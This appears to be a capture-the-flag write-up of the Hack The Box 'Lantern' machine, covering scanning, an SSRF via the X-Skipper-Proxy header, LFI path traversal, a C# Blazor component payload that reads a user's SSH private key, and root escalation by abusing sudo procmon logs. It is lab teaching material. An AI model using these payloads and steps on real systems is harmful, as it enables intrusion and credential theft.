Lantern

My writeup about Lantern machine in Season 6

Enumeration

Starting rustscan, I see port 3000 open for login page and port 80 for default web page, port 22 ssh connection, we can test on each of these port services while waiting for nmap to sanning deeper .

Result from nmap :

 nmap -A -T4 -sC -sV -p- 10.10.11.29                                                                                                             [ 9:22AM 130 ⨯ ] 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 09:22 +07
Warning: 10.10.11.29 giving up on port because retransmission cap hit (6).
Stats: 0:07:20 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 49.62% done; ETC: 09:36 (0:07:27 remaining)
Stats: 0:07:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 49.63% done; ETC: 09:36 (0:07:27 remaining)
Stats: 0:11:53 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 70.73% done; ETC: 09:38 (0:04:55 remaining)
Stats: 0:16:19 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 93.34% done; ETC: 09:39 (0:01:10 remaining)
Stats: 0:18:15 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 09:40 (0:00:22 remaining)                                                                                                  
Nmap scan report for lantern.htb (10.10.11.29)                                                                                                                          
Host is up (0.060s latency).                                                                                                                                            
Not shown: 65132 closed tcp ports (conn-refused), 401 filtered tcp ports (no-response)                                                                                  
PORT   STATE SERVICE VERSION                                                                                                                                            
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)                                                                                      
| ssh-hostkey:                                                                                                                                                          
|   256 80:c9:47:d5:89:f8:50:83:02:5e:fe:53:30:ac:2d:0e (ECDSA)                                                                                                         
|_  256 d4:22:cf:fe:b1:00:cb:eb:6d:dc:b2:b4:64:6b:9d:89 (ED25519)                                                                                                       
80/tcp open  http    Skipper Proxy                                                                                                                                      
|_http-server-header: Skipper Proxy                                                                                                                                     
|_http-title: Lantern                                                                                                                                                   
| fingerprint-strings:                                                                                                                                                  
|   FourOhFourRequest:                                                                                                                                                  
|     HTTP/1.0 404 Not Found                                                                                                                                            
|     Content-Length: 207                                                                                                                                               
|     Content-Type: text/html; charset=utf-8                                                                                                                            
|     Date: Sun, 18 Aug 2024 02:30:57 GMT                                                                                                                               
|     Server: Skipper Proxy                                                                                                                                             
|     <!doctype html>                                                                                                                                                   
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Content-Length: 225
|     Content-Type: text/html; charset=utf-8
|     Date: Sun, 18 Aug 2024 02:30:51 GMT
|     Location: http://lantern.htb/
|     Server: Skipper Proxy
|     <!doctype html>
|     <html lang=en>
|     <title>Redirecting...</title>
|     <h1>Redirecting...</h1>
|     <p>You should be redirected automatically to the target URL: <a href="http://lantern.htb/">http://lantern.htb/</a>. If not, click the link.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|     Content-Type: text/html; charset=utf-8
|     Date: Sun, 18 Aug 2024 02:30:51 GMT
|_    Server: Skipper Proxy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=8/18%Time=66C15F08%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,18F,"HTTP/1\.0\x20302\x20Found\r\nContent-Length:\x20225\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Sun,\x2018\x20A
SF:ug\x202024\x2002:30:51\x20GMT\r\nLocation:\x20http://lantern\.htb/\r\nS
SF:erver:\x20Skipper\x20Proxy\r\n\r\n<!doctype\x20html>\n<html\x20lang=en>
SF:\n<title>Redirecting\.\.\.</title>\n<h1>Redirecting\.\.\.</h1>\n<p>You\
SF:x20should\x20be\x20redirected\x20automatically\x20to\x20the\x20target\x
SF:20URL:\x20<a\x20href=\"http://lantern\.htb/\">http://lantern\.htb/</a>\
SF:.\x20If\x20not,\x20click\x20the\x20link\.\n")%r(HTTPOptions,A5,"HTTP/1\
SF:.0\x20200\x20OK\r\nAllow:\x20GET,\x20OPTIONS,\x20HEAD\r\nContent-Length
SF::\x200\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nDate:\x20Sun,
SF:\x2018\x20Aug\x202024\x2002:30:51\x20GMT\r\nServer:\x20Skipper\x20Proxy
SF:\r\n\r\n")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCont
SF:ent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r
SF:\n400\x20Bad\x20Request")%r(FourOhFourRequest,162,"HTTP/1\.0\x20404\x20
SF:Not\x20Found\r\nContent-Length:\x20207\r\nContent-Type:\x20text/html;\x
SF:20charset=utf-8\r\nDate:\x20Sun,\x2018\x20Aug\x202024\x2002:30:57\x20GM
SF:T\r\nServer:\x20Skipper\x20Proxy\r\n\r\n<!doctype\x20html>\n<html\x20la
SF:ng=en>\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</h1>\n<p>T
SF:he\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20server\.\
SF:x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x20check\x2
SF:0your\x20spelling\x20and\x20try\x20again\.</p>\n")%r(GenericLines,67,"H
SF:TTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20ch
SF:arset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(He
SF:lp,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plai
SF:n;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Reques
SF:t")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400\x20Bad
SF:\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnect
SF:ion:\x20close\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1166.77 seconds

Accessing the web server will see a response showing that the server is using Skipper Proxy and the web platform is Blazor which may contain SSRF vulnerabilities.

Link contain exploit this vuln from exploit DB : https://www.exploit-db.com/exploits/51111

The vuln perform we can unauthenticated URLs by adding an specific header (X-Skipper-Proxy) to the http request.

From the enumeration, the subdomain can determine that the web server also contains the LFI vulnerability, which should be give us much sensitive data for later testing.

LFI :

  ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/combined_directories.txt -u http://lantern.htb/FUZZ -t 100 

This command only provide subdomain "PrivacyAndPolicy" , to get futher , try LFI wordlists and burpsuite to find it

Discover from : http://lantern.htb/PrivacyAndPolicy?lang=../../../../etc/host&ext=conf

It will take least 30' to scan through this subdomain

Keep trying on this will get the content of file app.py and some more cool file .

Notice port 8000 seem reachable, let test more default port service

SSRF :

Port 3000,8000,5000 is often used by web applications or local services on the server. In this case, when checking for an X-Skipper-Proxy SSRF (Server-Side Request Forgery) lock, the goal of the job is to send a request with an X-Skipper-Proxy header pointing to http://127.0.0.1:5000/ to check if the proxy can be used to access a local service running on the server.

This service is usually not declared on the Internet and is only accessible from within the system (localhost). If the proxy is affected by an SSRF lock, an attacker can take advantage of this to send requests to internal services that are normally not accessible from the outside.

Port 5000 is often the default port for web applications using Flask (a Python microframework) or other compatible services. Therefore, you can check if Skipper Proxy can be exploited to access a local service set running on this port.

If the request returns a response from port 5000, it means that the proxy can be exploited to access the internal service, confirming that the SSRF vulnerability exists on the system.

Note

• The _framework directory is specific to certain web application frameworks, particularly Blazor applications in ASP.NET Core. -> will discover on this

• Blazor: _framework is a directory commonly seen in Blazor applications, which are part of the ASP.NET Core framework developed by Microsoft. Blazor allows developers to build interactive web applications using C# instead of JavaScript.

• And scanning the /framework/ directory in a Blazor or ASP.NET Core application, it makes sense to focus on .dll file extension.

But unfotunaltly non of my wordlist can found the correct file .dll on that .

From LFI , discover : /_framework/InternaLantern.dll -> download this file and analyze it with dotpeak or ilpsy : remember to add X-Skipper-Proxy ( do it with burp suite , add the header X-Skipper-Proxy with ip is localhost port 5000 ( this from testing ) and forward it will get the file .

move to Proxy and Forward to get the file

Use dotpeak can help analyhze file write by dotNet much easier :

got the password admin to login at port 3000 from decode base64

On port 3000 can login as admin with that password :

User

With upload content module -> we need to change the path to /opt/components/, by default it uploads to " Upload directory /var/www/sites/lantern.htb/static/images " like picture i capture above .

Burpsuite extension will help for this : https://portswigger.net/bappstore/8a87b0d9654944ccbdf6ae8bdd18e1d4

Download it from link or in burpsuite :

The menu after installed successful :

So server framework is .NET -> upload file DLL to trigger with File Upload vuln :

make the file .dll for the exploit first , we can try somethings like revershell , for short i willl take the ssh_keys ( it's have ) . :

using Microsoft.AspNetCore.Components;
using Microsoft.AspNetCore.Components.Rendering;
using System.IO;

namespace exploit
{
    public class Component : ComponentBase
    {
        protected override void BuildRenderTree(RenderTreeBuilder builder)
        {
            base.BuildRenderTree(builder);

            // Read the content of the sensitive file
            string file = File.ReadAllText("/home/tomas/.ssh/id_rsa");

            // Add the content to the render tree
            builder.AddContent(0, file);
        }
    }
}

Why tomas -> it from trace around the server with LFI , also find a email message from tomas too which will help root ( later ) .( var/tomas/mails)

Step by step build this :

1.Create a New Class Library:

Open your terminal and run the following command to create a new class library project:

dotnet new classlib -n exploit

This creates a new directory named exploit with the basic files for a class library project.

2.Navigate to the Project Directory:

Change to the newly created exploit directory:

cd exploit

3.Add the Necessary Package:

Add the required package for Blazor components:

dotnet add package Microsoft.AspNetCore.Components --version 6.0.0

This command adds the Microsoft.AspNetCore.Components package to your project, which is necessary for creating the Blazor component.

4.Modify the Class1.cs File:

Open the Class1.cs file in a text editor with the code i give above and save file.

5.Build the Project:

Now, build the project in Release mode:

dotnet build -c Release

This command compiles the code and generates the exploit.dll file in the bin/Release/net6.0/ directory.

After this will get the file and now upload it to server .

Upload and send to BTP tab

Derialize the input and change the value of name filed with the LFI recon and copy and change from JSON->Blazor

need the the name filed here

Serialize it :

Copy and overwrite it in proxy tab :

output successful :

Search this module ( the file name upload ís the module need to search ) will get the id_rsa key :

Now copy id_rsa key , add permision ( 600 ) and use ssh connect it will get the user flag tomas

Root

sudo -l can help a first looking on it :

Will see (ALL : ALL) NOPASSWD: /usr/bin/procmon can run with sudo -> check process now :

ps: Displays information about running processes.

-a: Displays all processes related to all users, not just the current user's processes.

-e: Similar to -a, but lists all processes running on the system.

-f: Displays full-format listing, including PID (Process ID), PPID (Parent Process ID), UID (User ID), status, creation time, and full command.

sudo /usr/bin/procmon -p pid_of_process_in_picture -e write

Wait for few minutes and hit F6 -> it's will export a db file in dicrectory -> transfer this to attack machine then access it .

i change the name to easy for transfer file

Transfer it to attack machine :

Access with sqlite3 can grap some infomation

From now find around all tables and data in it, at here i will make it easier is focus on result code -> could be the result or status code returned by a system call or function.

There are so many command at here so need trace for a while , i will put command in another file to analyze with sql command extract :

SELECT hex(substr(arguments, 9, resultcode))

FROM ebpf

WHERE resultcode > 0

ORDER BY timestamp;

decode it from hex because had encode all command extract in hex ( just for sure it's correct so suggest is encode it as hex for easier copy ) :

Download it from cyberchef afer decode , baisctly will see command like : echo Q 33EEddddttddww33ppMMB

and remove duplicate will got the password of root :